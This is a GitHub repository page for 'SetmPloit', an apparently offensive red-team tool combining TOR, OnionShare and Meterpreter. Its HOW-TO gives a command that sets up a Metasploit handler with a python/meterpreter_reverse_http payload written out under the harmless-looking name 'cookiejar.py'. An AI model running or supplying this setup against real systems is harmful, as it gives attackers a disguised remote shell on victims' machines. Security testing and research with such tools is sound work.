Skip to content

ToxicEnvelope/SetmPloit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SetmPloit


This repository contains a Red team Offensive Security Exploitation Tool
which uses TOR and OnionShare as long with Meterpreter Session.

this project is for security testing and research use only! use at your own risk.

HOW-TO

$ git clone https://github.com/ToxicEnvelope/SetmPloit.git
$ /usr/bin/python -m venv venv
$ source venv/bin/activate
$ ./venv/bin/python -m pip install -r requirements.txt
$ ./venv/bin/python stemploit.py -oftp 1 -lh 127.0.0.1 -lp 5000 -rp 80 -ex exploit/multi/handler -p python/meterpreter_reverse_http -of cookiejar.py

happy hacking

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages